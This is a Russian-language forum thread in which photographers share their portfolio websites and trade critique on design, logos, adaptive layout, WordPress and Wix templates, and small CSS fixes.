ребята как вам мой сайт? была темно-серая тема, и логотип под нее светлый, сейчас логотип поменяю на более темный чтобы смотрелся. логотип сам состряпал с фотографии. www.ekaterinagrishina.r…
Меня лого смущает, он однозначно из стилистики сайта выпадает.
думаете текстом ограничиться?
Обновил свой сайт и немного переделал: www.taurusphoto.com
www.ivash.com.ua
Буду признателен за критику и мнения!
уже не тестирую, запили основным alekseysmirnov.ru
тестирую теперь сайт жены ver.liveversion.ru
мне не нравится, что внешние ссылки ничем от основного меню не отличаются. и счетчики зачем-то внизу вставили. они никому не интересны и портят внешний вид
хм, подумаю на счет внешних ссылок.
Счетчики? пожалуй да, надо удалить, или невыдимыми сделать :)
а смысл в них? поставьте код метрики и аналитики – этого за глаза. еще я бы отступ сверху уменьшил и кнопки плюсо без градиента
То было мое заблуждение.
Отступ самого раздрожает, пока не разобрался как уменьшить.
header.top {
margin: 30px 0 1em;
}
Спасибо, custom css рулит :)
стильненько стало) мне нравится)
косяк с видео. в движке нет поддержки адаптивного видео? Если разбираетесь, то это делается с помощью FitVids.js
  • Ảnh 75
Хм, вообщето должна быть, у меня адаптируется, странно.
  • Ảnh 76
  • Ảnh 77
в хроме норм, в сафари 7.0.2 не адаптируется
странно, сафарик 7.0.3 , хром, лиса, icab крайних версий.
а ссылки на профили в социалках можно внизу текстом или картинками. у меня вот так, например
  • Ảnh 74
ага, спасибо, сейчас попробую.
нужные иконку ищутся тут) www.iconfinder.com
Понравилась идея с реализацией кнопки вверх, простите спер код с вашего сайта :(
Вот не могу определиться руку или треугольник оставить?
  • Ảnh 78
  • Ảnh 79
и то и другое непонятно )
видео неадаптивное :D 10.9.2, safari 7.0.3На самом деле я нешел причину, почему так – дело в расширении для сафари Youtube5 – он берет размеры фрейма, которые скопиованы при расшаривании. Многие этим плагином пользуются, поэтому я советовал бы вставлять видео размером 500px, например. У кого плагин стоит – не поломается, у кого нет – и так все отлично будет.
Алекс, движок подразумевает вставление обычной ссылки с хостера видео, что я и делал, тоесть размер фрейма не указывается при вставлении, но по сути сам дмижок присваивает максимальное значение фрейма которое он считывает из метаданных видео с хостинга видео, если так можно выразиться. Так вот если вставлять именно кодом//фреймом в 500рх, то конечно проблем станет меньше, но заморочек больше. Подомаю... Спасибо за выявление косяков.
тогда забей) клиенты вряд ли сидят на маке, да еще на сафари да еще и с плагинами :D
На счет мака с сафари – не был бы так категоричен, а вот с плагинами – да, согласен.
Можно еще нескромный вопрос?
Обыскался в нете как не прописать сustom css что бы не отображались заголовки h2, смог только изменить цвет.
  • Ảnh 80
видимо
.wrap h2 {
display:none;
}не самое лучшее решение – заголовки важны для поисковиков. и убирать лучше не таким способом, а лишний код в теме.
да понимаю что заголовки важны,
пока решил прописать размер 0pt
h2 { font-size: 0pt;font-family:"Cuprum", Helvetica, Arial, sans-serif; }
интересно, в таком виде поисковики будут их видеть?
Спасибо за код.
Нельзя делать текст заголовков или текста под цвет фона или мелкого или нулевого размера – поисковики это все видят, и можно попасть в черный список надолго.
gorinafoto.com мой сайт, что скажете?
классный лого!) а сайт как и сотни других у гофотовеб. оценивать нечего. все давно оценили в соотвествующих темах
хоть лого порадовал))))
лого офигенный) да вообще все отлично, не переживайте)
Лого клевый)
заработал. мне кажется, тебе бы идельно в черно-белой гамме сайт подошел бы. со шрифтами поработать бы
fotola.ru/ мой скромный , интересно мнение. Еще буду редактировать.
приятный. просмотр картинок не самый удобный, но в целом хорошо
буду рада услышать ваше мнение :)
linakivaka.com
спасибо большое!
Вот такой эксперимент. Персональный сайт. Пока на бесплатном сервисе. Думаю над переносом на один из моих доменов. fgstudioru.wix.com/fg-s…
кривая неадапативная верстка с говнокодом) страшный сервис
Мой сайтик www.chaltcev.ru
Буду рад услышать совет ;-)
лого прикольный)
интересно мнение коллег))
barsstudio.com
Очень приятный сайт. Единственно, я бы уменьшил шрифт внутри серий, убрал календарь и информацию о теме внизу. Ну и не хватает заголовков к сериям к превью.
спасибо)) будем допиливать)
Прикольные кружочки)
красиво! :)
Ниче такой) стрелка над совой прикалывает))
www.mexphoto.lvОбновил вот немного главные картинки, и добавил наконецто раздел – Love storyбуду рад критике
Flash – смеетесь?
а вот мне не смешно ;/ не флешовые версии галерей меня покачто не цепляли своей практичностью и лёгкостью понимания. Был момент хотел перейти на вордпресс, так меня не зацепила ни одна галерея. Если посоветуете галерею буду рад :)
Я хз как ваш сайт посмотреть. На планшетах нет флэша. Клиенты будут рады
спасибо, сегодня потратил день :) нашел то что понравилось, запилил на сегодня в лав стори, как только так сразу сделаю для другого раздела :) но заставили задуматься по поводу флеша :)
Пожалуйста, посмотрите, буду рад критике!
alexglad.blogspot.com
Текстура на фоне уж очень выделяется, когда сайт черный с серым шрифтом. Плюс текстура очень низкого качества.
минусы
- неадаптивный для млеких устройств
- дизайн 10-ти летней давности
Прикрутил блог (старый) на вордпрессе alekseysmirnov.ru/blog/…
Постарался выдержать в том же стиле что и сам сайт.
Вот теперь думаю как сделать блог "резиновым"
А в чем сложность? Ширина для контейнера #wrapper {
max-width:900px;
width:90%;
} Для картинок img {
max-width: 100%;
height: auto;
} А остальное детали
Спасибо Алекс, но что то не получается :(
это пример, а не решение для твоего сайта))
Как вам эскизик редизайна?
  • Ảnh 82
Попинайте и мой плиз ;)
удобно горизонтальный скроллинг?
www.kudrik.com
Горизонтальный скролинг на любителя. достаточно долго ромашка крутится загружая следующую фотографию при скролинге нервирует :)
Ааа, прогрузилось и теперь бистро листается :) Я думал динамическая подгрузка контента для экономии трафика :) В остальном ништяк!
да.. меня смущает это тоже. Статистика меня насторожила просто. Видимо простому народу нужно вертикальный блог-стайл :) Хотя мне очень нравится горизоантальный. Буду думать.
блин, опять гоуфотовеб....
почему "блин опять"? они отлично все делают – быстро и дешево.. что еще нужно от сайта визитки? Есть конечно вопросы определенные к ним... Но с другой стороны – за 150 баксов в года – меня все устраивает. 2 дня повозиться заполнить все – и у тебя готовый работающий сайт.
Тут тема не про то, устраивает или нет. Ну вот написали выше кому с таким же сайтом – отличный сайт. И что, теперь вам всем одинаковые комменты писать?))
минималистично – мне нравится. Лично меня раздражает лозунг "добро пожаловать в мир фотографии".. слишком пафосно, имхо )
Спасибо, пытаюсь использовать маркетинг и стараюсь закрепиться в умах в том числе при помощи лозунга)
Приятненький. Ток эта панелька выезжающая панелька слева с огромными иконками, на мой взгляд, совсем лишняя.и косячок
  • Ảnh 83
Так это не косячок, а наоборот теоретическая помощь комментирующему) Спасибо за мнение! Панельку уберу, когда найду как)
Я про обрезанную надпись на кнопке..
О, точно, спасибо!
Я бы все снес и делал заново. Вот посмотрите примеры классных сайтов siteinspire.com
Предлагаю самые классные сайты из темы внести в топик. Предлагайте кандидатов :)
nikolay-kireyev.com – вот мой стильненький и модненький сайтик =)))))
вам в тему гофотовеб
Второй редизайн блога. Решил остановиться на таком варианте. Как вам? Постов на странице будет больше, это тестовый сайт
  • Ảnh 84
Чет майвед безбожно поганит картинки. Ссылка на скрин www.dropbox.com/s/1ce8c…
Ну ка, скажите пару ласковых)) krasotavkazdom.com
Крутяк.
А как счетчик просмотров моста сделал?
моста?)) на wp такие штуки просто делаются. способов – десятки )
шикарный сайт и карточки!
что-то все съехало.
  • Ảnh 85
  • Ảnh 86
Упс...на mac не тестировала... спасибо за наводку, доработаю)
давненько я сам на нем не был, но вот всё же:
www.eldara.net
пасибо)
Уфф. Наконец-то допилили тему для wordpress. Это основа, но что примечательно, можно добавлять в нее шаблоны вывода. Можно прям в админке создавать страницы с выводом постов из любой, любых или всех категорий в любом шаблоне. Пока только три шаблона – блог, классика и пинтерест.
Слайдер – royalslider
Контактная форма – contact form 7
Поддержка ретина превью сразу, больших картинок через плагин retina 2x, чтобы у юзеров зря тафик не жралсяЧерез админку:- Загрузка лого обычное и ретина
- Иконки на соц сети
- Счетчики ЯМ и ГА
- Поле для копирайтаВсё адаптивное и ретино-поддерживаемое. Еще есть пара плюшек не особо нужных большинству, да не важно.Пример создания страницы с выбором шаблона и рубрики на последнем скрине
  • Ảnh 90
  • Ảnh 91
  • Ảnh 92
  • Ảnh 93
  • Ảnh 94
  • Ảnh 95
ну да, сама, на WIX-e :)
wix – это адский трэш. мало того, что сайты абсолютно сео непригодные, так и в них столько мусора и глючных скриптов, что ого-го. если хотите конструктор, то лучше squarespace попробуйте. хотя для раскрутки они тоже не очень подходят, но стильные и быстрые.
Не буду обсуждать тут сайты в отдельности, т.к. каждое техническое/дизайнерское решение имеет право на жизнь, но хочу отметить, что большинство сайтов фотографов грузятся ооочень долго. Это предсказуемо, особенно когда изначально портфолио является основной частью главной страницы. Думаю, что стоит сконцентрироваться именно на этом, ибо клиент заманается ждать загрузки страницы пол часа и просто уйдет. Возможно основная причина – использование виртуального хостинга с обрезанными по самое "не хочу" ресурсами. Сейчас на рынке достаточно много предложений виртуальных серверов по цене даже равной виртуальному хостингу или не на много выше.
тоже интересно мнения =)
lepaev.ru/
Приятный. Я бы с шрифтами поработал
красиво, но зачем давать ссылки на конкурентов и их цены?)))
это такой эксперимент, думаю люди будут дольше проводить на сайте. Для поисковиков в общем.
ого :) — Составляете ли вы договор?Я работаю без договора. Вся работа основана на доверии. Порядок фотосъёмки мы обсуждаем и утверждаем при встрече. Я очень дорожу своей репутацией и обязательно выполню всё о чём мы договорились.
Добавили новый шаблончик в нашу тему для wordpress) Адаптивный, само собой
  • Ảnh 97
  • Ảnh 98
Решил обойтись простым и лаконичным сайтом:
alexmakhlay.ru
Буду рад комментариям :)
гофотовеб тут не обсуждают ))
Ха-ха-ха, сайт Веры – vera-smirnova.ru , разработчики движка добавили в качестве примера , на своем сайте в сторе – store.koken.me/themes/e… )))
А мы то думали, что так много посещений хрен знает откуда, из разных уголков планеты )))
Признание ))))
Вот мой сайт. Что скажите? is-87.com/
Скажем что "ВНИМАНИЕ: сайты гофотовеб обсуждаются в соответствующей теме"
Всё, запилил в онлайн yarovikov.ru
самое кайфово эта страница на айпаде смотрится в вертикальной ориентации
  • Ảnh 100
Чет мне не очень нравится все же что нету рамочек/разделений, все как сто сливается что-ли... я про главную.
Видимо вы так и задумывали конечно.
так и задумывалось ага)
отличный сайт)) зависла на нём и вот что нашла в разделе Информация
"Мой результат напрямую зависит от ваc и многих ТЕХ деталей, которую делают вашу свадьбу уникальной" – "тех" здесь лишнее)
Почему лишнее? Это типа намёк))
Перечитайте ещё раз предложение, это просто неграмотно написано. Без ТЕХ было бы правильно.
"Мой результат напрямую зависит от ваc и многих деталей, которую делают вашу свадьбу уникальной"
Не соглашусь. Это художественный оборот
Вот сайт нашей студии) Находится еще в доработке мелочей)
twins-studio.ruПохож на "гофотовэб"
ниче так :)
вот только музыки не надо...
На счет музыки спасибо что сказали)
Учитывая что на родной теме twentytwelve, то вообще ништяк!
А что такое twentytwelve?)
Если такие вопросы, значит не сами делали )))
Стандартная тема вордпресса )
Я сайтами не занимаюсь, вы правы)
Поэтому я лишь могу просить что то изменить или добавить у человека, который этим занимается)
И это правильно, каждый должен заниматься своим делом.
В разделах, фото в фапке не скейлится/маштабируется
  • Ảnh 103
  • Ảnh 104
  • Ảnh 105
А что значит не скейлится? Я в терминах этих не осень разбираюсь! В смысле не вся шапка(фотография посередине) целиком показывается?
переделал все что хотел))
Теперь лучше для восприятия без музыки?))) twins-studio.ru
ага :)
ниже написал :)
не маштабируется картинка :)
  • Ảnh 110
Подскажите пожалуйста, что улучшить www.rkwed.com
Заранее большое спасибо!!!)))
не по адресу обратились :)
В шапке темы же написано: ВНИМАНИЕ: сайты гофотовеб обсуждаются в соответствующей теме
Эх....((( , а шапку читать то надо)))
Что-то не нравится, а что не пойму www.okravtsov.ru Плиз хелп )))
Да, что-то мне тоже не нравится) переделывать с нуля, посмотрев красоту по ссылкам в первом сообщении в теме
Вот моё. Буду рад критике, советам. photo-graphics.ru
Спасибо. А можно подробнее? Если не затруднит.
дизайн устарел)
устарел
Ну и я на разбор www.alinamoskovtseva.co…
Сегодня сказали, что долго грузится(((
Хотелось бы слышать конструктивную критику)
Спасибо!
уже не грузится, меняйте хостинг )
а что пишет?
менять что-то крайне проблематично, у меня на конструкторе сайт.
с компа или с мобильного устройства заходили?
С компьютера, мозилла – пустая страница. Сейчас на работе с оперы зашел – загрузился. Конструктор – зло, никакой самостоятельности, если еще не увязли там лучше сварганить что независимое. Заглючил хостинг, переехал на другой, а тут есть ли возможность переезда, если есть, нужно нанимать спеца для адаптации под другой движек, а если владелец конструктора закроет проект и т.п. вопросы могут возникнуть
Ой, не, голову этим заморачивать нет никакого желания. Разбираться с этими хостингами, языками. Пробовала как-то, поняла, что не мое. А здесь все очень просто – хочешь и шаблоны тебе, и сам можешь что угодно наворотить, и приложения всякие. Ну, а слететь и закрыться может все что угодно.
Не грузит видимо из-за большого размера фотографий. Надо поэксперементировать.
Прислушался к мнению коллег и переделал некоторые моменты, хоть их и было немного)
Мобильная версия теперь отражает полностью шапку, музыку убрал) Есть еще существенное что-то что нужно было бы изменить?) twins-studio.ruБуду благодарен за мнение) На роль лучшего сайта года не претендую)
1. Я конечно понимаю цель тегов на странице "О нас", но визуально это напрягает. Может как-то по другому реализовать.
2. Страницы как-то незаконченными выглядят без футртера/подвала, програмер поймет о чем я.
3. Еще бы реализовать динамическую загрузку картинок (в сериях), по мере проматывания вниз контента. Очень существенно экономило бы трафик на мобильных устройствах.
Спасибо за рекомендации)))
кто-нибудь имел дело с www.prophoto.com/
очень интересные у них шаблоны
интересен как раз опыт сотрудничества с ними
Егор, насколько знаю, у Эмина блог на профото сделан, у него можете поинтересоваться.
И в данной теме у одного товарища видел, если отпишется – будет круто.
А какой шаблон там интересный? Меня ничего не зацепило
скажем после допиливания весьма-весьма edpeers.com
да, приятный весьма. ток неадаптивный. напомнило) sites.yarovikov.ru/shab…
оу, на wix бывают ничего такие сайты, оказывается) а вообще бы не рекомендовал на wix сидеть
Буду благодарен за аргументированную критику, по сайту chocoweds.ru. Раньше сидел на gofotoweb, но рекламщики переубедили создать свой. Сайт еще не до конца оформлен, хотелось бы вашего мнения.
В целом ничего необычного – похож на стоковые шаблоны. ну и неадаптивный
В процессе. Как оно?)
  • Ảnh 116
  • Ảnh 117
  • Ảnh 118
  • Ảnh 119
за мнением в ветку гоуфотовеб!
научитесь читать первое сообщение уже...
обновил свой, вернее реанимировал)
буду заполнять потихоньку)
bearman.com.ua/
очень круто!!!!))))))))))))))))))))) улыбалась долго))
Здравствуйте, коллеги!) моё детище – o-photos.ru/
Хочу внести изменения в свой сайт. Хочу поменять логотип, сделать шрифт меню более изящным. Хочу видоизменить пункт меню СВАДЬБА. Сейчас у меня там идет градация по эпизодам свадьбы: сборы, невеста, церемони и проч. Хочу сделать общее портфолио из всех самых лучших карточек и потом выложить несколько отдельно целых свадеб. Что думаете? lalafoto.com
И по цветам более воздушный сделайте. И логотип не забудьте версию для ретина-экранов, а то этот размытый.
Мне нравится серый фон. Думаете, сделать его на несколько тонов светлее?
Закончили клевый минималистичный сайт для видео-портфолио на базе wordpress. Получилось кайфно! На главной странице видеофон!
Пока не заполнен, но работает sashaselivanov.ru
  • Ảnh 123
  • Ảnh 124
Хочу что-то переделать, но не знаю что и как...
saverchenko.com/
  • Ảnh 125
Читайте заглавный топик
Приятный! В принципе, все клево, за исключением поддержки ретины
www.artchie.by – сделал сам, знаю что там еще много не доработок, в силу моей не образованности в этой сфере)
Буду рад любой критике)
lesovskaya.com/
Интересно мнение только о сайте), чего -то не хватает, но и перегружать не хочется)
wix за километр видно – неадаптивный и глючный. Вроде заходишь на главную -все ок, но потом смотришь, что в экран не входит, нет поддержки ретины, форма контактов 5-летней давности и тд
  • Ảnh 130
Ура, наконец-то обновил свой сайт. Что скажете?
dgphoto.ru/
гофотовеб? или скваспейс, что в принципе пофиг. какая разница, откуда спизжено))
комменты, как всегда, по делу...
если гофотовеб, то читайте шапку темы. если скваспейс, то тоже нет смысла обсуждать
Закончил сайт для визажиста-стилистаsgrosheva.comВообще, на главной странице будет фоновое видео, а при его отстутсвии выводится фоновая картинкаВроде, прикольно получилось. Жаль, в галерее разного размера фотки, а то было бы красивее при выводе полной картинки
  • Ảnh 132
  • Ảnh 133
Гляньте, пожалуйста мой camerist.by
Позавчера основные работы выполнил, но судя по вебвизору на больших экранах есть проблема с зернистостью фото, т.к. по максимуму ужимал чтобы вес уменьшить.
Вроде и норм, но по мне так впечатление обычной стоковой темы. Немного бездушно, немного неудобно, немного неминималистично. На моем буке (ретина 15) фотки смотрятся хорошо
Да, затачивалось под тип Landing Page, до души там далеко. А в чем неудобство, если не секрет?
Возможно, это чисто субъективное мнение, но такой поток всплывающей информации на одной странице не располагает к объективному восприятию.Цветовые акценты не расставлены, глаз мечется по всей странице, на контенте не останавливается. В общем, лично мне некомфортно смотреть. Ну и фотки со слайдера, открывающиейся на новой странице – это нехорошо.
Спасибо, буду думать
www.janens.com
сайту правда три года уже.
Давно попа сменить)
я тоже сделал новый сайт.
урл старый:
www.monst.org
галерея пока тоже старая, ее можно не открывать) ну и вообще недопилен (некогда), но уже запущен)))
главная чет у меня жестко притормаживает в сафари
хм, у меня только виндовз и ондройд аппараты под рукой.. все отлично по идее.. обычный вордпресс.
может объем просто большой. устройство мобильное?
на макбуке. в хроме норм
не знаю(
движок вордпресс, шаблон хороший покупной, не должно быть так по идее. помучаю программера значит, спасибо
Можете и мой заценить)
masherwed.com
гофотовеб тут не оценивают
желтый цвет на мой субъективный взгляд не очень и еще долго грузится главная страница. я бы ушел с сайта
Цвета и дизайн – как-будто 5 лет назад )
Всем привет! Интересно мнение о сайте нашей Фотошколы в Казани – www.openschool.biz
Желательно конструктивная критика
  • Ảnh 137
Стандартные шаблоны особого смысла нет обсуждать – они все одинаковые. Единственно, я бы код на вашем месте прошерстил, в таких темах часто скрипты для всяких левых задач встерчаются.
Свой сайт я еще не закончил из-за проблемы, может, кто-то знает ее решение: вертикальные фото не центрируются в слайдере. Причем я могу по превьюшкам нажимать, пролистывая фото в обратном порядке, и тогда фото встают в центр.
Сайт на Вордпрессе, плагин Юнит Галлери
  • Ảnh 138
Самый лучший слайдер – это Fotorama )
Почитал немного. Интересный, но превью располагаются однотипно (других примеров не нашел). У меня задумано примерно так:
  • Ảnh 139
Да я видел. Не лучшая идея
Да, могу согласиться. Но понравился именно такой вариант.Почему-то
Да это понятно) К лучшему не сразу приходишь, а только после многочисленных проб и ошибок)) ваш слайдер вроде не особо адаптивный (на мелких экранах)
Есть такое. С планшета посмотрел – плохо дело. Решаю проблемы по порядку.

Đăng nhập hoặc Đăng ký để bình luận